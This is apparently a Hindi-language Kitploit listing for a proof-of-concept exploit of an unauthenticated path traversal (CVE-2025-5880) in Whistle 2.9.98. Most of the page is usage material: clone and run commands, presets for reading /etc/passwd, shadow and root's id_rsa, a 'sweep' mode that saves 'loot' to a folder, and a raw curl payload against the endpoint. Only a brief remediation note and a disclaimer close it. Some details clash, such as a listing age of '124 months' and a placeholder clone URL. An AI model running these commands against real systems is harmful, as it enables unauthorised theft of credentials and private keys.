Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5880-PoC — Whistle v2.9.98 में एक अप्रमाणित पथ ट्रैवर्सल भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण। | Kitploit
उपकरण/GitHubGitHub/yacine-rm/cve-2025-5880-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Whistle v2.9.98 में एक अप्रमाणित पथ ट्रैवर्सल भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण।

रिपॉजिटरी देखें
124 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-5880 — Whistle 2.9.98 पथ भ्रमण PoC

Python CVE CWE License

Whistle v2.9.98 में एक अप्रमाणित पथ भ्रमण भेद्यता के लिए प्रमाण-अवधारणा शोषण।


भेद्यता सारांश

क्षेत्रविवरण
CVE आईडीCVE-2025-5880
CWECWE-22 (पथ भ्रमण)
प्रभावित सॉफ़्टवेयरWhistle ≤ 2.9.98
प्रभावित एंडपॉइंट/cgi-bin/sessions/get-temp-file
हमला वेक्टरनेटवर्क — कोई प्रमाणीकरण आवश्यक नहीं
प्रभावहोस्ट फ़ाइल सिस्टम पर मनमानी फ़ाइल पढ़ना

filename क्वेरी पैरामीटर को डिस्क पर फ़ाइल खोलने से पहले सैनिटाइज़ नहीं किया जाता है, जिससे हमलावर इच्छित अस्थायी-फ़ाइल निर्देशिका से बच सकता है और Whistle प्रक्रिया की अनुमति वाली किसी भी फ़ाइल को पढ़ सकता है (जैसे /etc/passwd, /root/.ssh/id_rsa)।


त्वरित प्रारंभ

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# No external dependencies
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

उपयोग

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]
फ़्लैगविवरण
-u / --urlलक्ष्य का आधार URL (जैसे http://192.168.1.10:8899)
-f / --fileपढ़ने के लिए मनमाना फ़ाइल पथ
--presetनामित शॉर्टकट: passwd shadow hosts id_rsa …
--sweepस्वचालित रूप से सभी प्रीसेट्स पर पुनरावृति करें
-o / --outputपरिणाम को फ़ाइल में सहेजें
--save-dir--sweep से लूट डंप करने की निर्देशिका
--timeoutHTTP टाइमआउट सेकंड में (डिफ़ॉल्ट 10)

उदाहरण

root@kitploit:~
# /etc/passwd पढ़ें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# रूट की SSH निजी कुंजी प्राप्त करें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# एक मनमाना पथ पढ़ें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# सभी प्रीसेट्स स्वीप करें और सहेजें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

रॉ PoC (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

उपचार

Whistle को एक ऐसे संस्करण में अपडेट करें जो filename पैरामीटर को इच्छित अस्थायी-फ़ाइल निर्देशिका तक सीमित करता है और मान्य करता है। सर्वर-साइड पर अनुमति सूची पथ सामान्यीकरण लागू करें (जैसे path.resolve + उपसर्ग जाँच)।


अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
ऐसी प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।

टूल डाउनलोड करें